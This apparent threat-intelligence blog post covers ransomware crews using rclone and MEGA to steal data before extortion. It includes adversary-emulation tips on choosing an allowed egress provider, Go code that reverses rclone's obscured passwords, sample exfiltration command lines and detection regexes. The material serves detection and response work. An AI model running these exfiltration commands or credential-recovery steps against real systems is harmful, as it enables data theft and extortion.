This #ThreatThursday is all about leveraging cloud storage to exfiltrate data. We also cover how the tool involved leaves the cloud account credentials unsecured on the file system. In particular, we are going to look at how threat actors leverage cloud services like MEGA and use open source tools like rclone to exfiltrate data. This exfiltration typically happens before the ransomware is deployed, and the stolen data is then used to extort the target company into paying. As usual, we will cover Cyber Threat Intelligence, and Attack, Detect, and Respond.
ADATA, the Taiwanese memory and storage manufacturer, had 700GB of data leaked by Ragnar Locker using the MEGA cloud service prior to the data being ransomed. This is called "Double Extortion": data is stolen first, and samples of it are posted online to pressure the company into paying even if it manages to restore its ransomed network from backups. We have covered multiple threat groups that perform double extortion, such as Conti, DarkSide, Egregor, Ryuk, and Maze. Those groups tend to exfiltrate the data through the same C2 channel they use for the intrusion; what is different here is a separate, legitimate-looking channel to a public cloud storage provider.
In this #ThreatThursday, we are going to look at Exfiltration Over Web Service (MITRE ATT&CK T1567) and its sub-technique Exfiltration to Cloud Storage (MITRE ATT&CK T1567.002). Threat actors often create accounts with cloud storage providers such as MEGA, stage the stolen data there, and then leak it from the same place for extortion purposes.
Across a number of these attacks, threat actors have been observed using an open source tool called rclone. As per their site, "Rclone is a command line program to manage files on cloud storage. It is a feature rich alternative to cloud vendors' web storage interfaces. Over 40 cloud storage products support rclone."
The first step to exfiltrating data to a cloud storage account is identifying which web service to use and creating an account. Since rclone supports over 40 providers, the adversary is not tied to any one of them. From an adversary emulation perspective, you will need to choose a provider whose endpoints are allowed outbound from the target network, so check egress firewall rules and web proxy categories before you start. We will use MEGA for this example because that is what Ragnar Locker uses.
Emulation Steps
Writing effective detections for adversary behaviors is difficult when adversaries use legitimate tools with malicious intent. However, with security testing and detection tuning it is possible to limit the impact these tools will have on an organization. Security testing with adversary emulation allows these techniques to be repeated until a detection is written and tuned to the environment. Attack, Detect, and Respond made it possible to generate a threat-informed test, identify detection gaps, and outline mitigations and remediations that security teams can respond with.
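The following is an added example written for this post, not code from SCYTHE, rclone, or any of the threat groups discussed. It ties together the emulation step above (creating a MEGA remote for rclone) and the detection discussion: it reproduces what `rclone obscure` and `rclone reveal` do, renders the `rclone.conf` section that `rclone config create <remote> mega user <user> pass <obscured>` writes to disk, and then scores a handful of process command lines against rclone indicators. The 32-byte key is the fixed key rclone ships in its source (lib/obscure/obscure.go), which is why a `pass =` value in `rclone.conf` is obscured rather than encrypted. The remote name `exfil`, the user name, the password `hunter2`, the sample command lines, and the indicator set are all constructed for this example; the flags and subcommands the indicators look for are real rclone options.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"regexp"
	"strings"
)

// cryptKey is the fixed key rclone ships in lib/obscure/obscure.go. Every rclone
// binary carries the same key, so a "pass = ..." value in rclone.conf is
// recoverable by anyone who can read the file: obscured, not encrypted.
var cryptKey = []byte{
	0x9c, 0x93, 0x5b, 0x48, 0x73, 0x0a, 0x55, 0x4d,
	0x6b, 0xfd, 0x7c, 0x63, 0xc8, 0x86, 0xa9, 0x2b,
	0xd3, 0x90, 0x19, 0x8e, 0xb8, 0x12, 0x8a, 0xfb,
	0xf4, 0xde, 0x16, 0x2b, 0x8b, 0x95, 0xf6, 0x38,
}

// Obscure does what `rclone obscure` does: random IV || AES-CTR(plaintext),
// base64url-encoded without padding.
func Obscure(plaintext string) (string, error) {
	block, err := aes.NewCipher(cryptKey)
	if err != nil {
		return "", err
	}
	buf := make([]byte, aes.BlockSize+len(plaintext))
	iv := buf[:aes.BlockSize]
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return "", err
	}
	cipher.NewCTR(block, iv).XORKeyStream(buf[aes.BlockSize:], []byte(plaintext))
	return base64.RawURLEncoding.EncodeToString(buf), nil
}

// Reveal reverses Obscure, exactly as `rclone reveal` does.
func Reveal(obscured string) (string, error) {
	buf, err := base64.RawURLEncoding.DecodeString(obscured)
	if err != nil {
		return "", err
	}
	if len(buf) < aes.BlockSize {
		return "", errors.New("obscured value too short to hold an IV")
	}
	block, err := aes.NewCipher(cryptKey)
	if err != nil {
		return "", err
	}
	out := make([]byte, len(buf)-aes.BlockSize)
	cipher.NewCTR(block, buf[:aes.BlockSize]).XORKeyStream(out, buf[aes.BlockSize:])
	return string(out), nil
}

// MegaRemoteConfig renders the rclone.conf section that
// `rclone config create <remote> mega user <user> pass <obscured>` writes to disk.
func MegaRemoteConfig(remote, user, obscuredPass string) string {
	return fmt.Sprintf("[%s]\ntype = mega\nuser = %s\npass = %s\n", remote, user, obscuredPass)
}

// Command-line indicators for rclone. The set is this example's own heuristic;
// the flags and subcommands it looks for are real rclone options.
var rcloneIndicators = []struct {
	name string
	re   *regexp.Regexp
}{
	{"rclone binary name", regexp.MustCompile(`(?i)\brclone(\.exe)?\b`)},
	{"--config pointing at a dropped config file", regexp.MustCompile(`(?i)--config[= ]`)},
	{"transfer subcommand with an rclone remote (name:path)", regexp.MustCompile(`(?i)\b(copy|copyto|sync|move)\b.*\s[a-z][a-z0-9_-]+:`)},
	{"bulk-transfer or automation flag", regexp.MustCompile(`(?i)--(transfers|ignore-existing|auto-confirm|multi-thread-streams)\b`)},
	{"cloud storage provider keyword", regexp.MustCompile(`(?i)\bmega\b`)},
}

// DetectRclone returns the indicators a process command line hits and whether
// two or more hit. Two hits keep a renamed rclone binary detectable while
// leaving ordinary copy commands alone.
func DetectRclone(cmdline string) ([]string, bool) {
	var hits []string
	for _, ind := range rcloneIndicators {
		if ind.re.MatchString(cmdline) {
			hits = append(hits, ind.name)
		}
	}
	return hits, len(hits) >= 2
}

// SampleCommandLines are constructed process-creation command lines, not real telemetry.
var SampleCommandLines = []string{
	`rclone.exe copy C:\Finance mega:exfil --transfers 32 -q`,
	`svchost.exe copy "C:\Finance" mega:exfil --config C:\Users\Public\rc.conf --ignore-existing`,
	`robocopy C:\Finance D:\Backup /E /Z`,
	`powershell.exe -c Copy-Item C:\Finance D:\Backup -Recurse`,
}

func main() {
	obscured, _ := Obscure("hunter2") // constructed password
	fmt.Print(MegaRemoteConfig("exfil", "attacker@example.com", obscured))
	plain, _ := Reveal(obscured)
	fmt.Printf("reveal -> %s\n\n", plain)
	for _, cl := range SampleCommandLines {
		hits, bad := DetectRclone(cl)
		fmt.Printf("suspicious=%-5v hits=[%s]  %s\n", bad, strings.Join(hits, "; "), cl)
	}
}
```

Two points to take from running it. First, the `pass =` line written to `rclone.conf` round-trips back to the plaintext with a key anyone can read out of rclone's source, so a responder who finds a dropped config file can recover the attacker's account credentials, and a defender should treat that file as a credential artifact, not just a configuration. Second, the second sample line is flagged even though the binary was renamed to `svchost.exe`, because the remote syntax, the `--config` flag and the transfer flags still show up in the command line; matching on the file name alone would miss it. The remote-name regex is intentionally loose and will fire on a few non-rclone command lines, which is why a single hit is not enough on its own.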
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.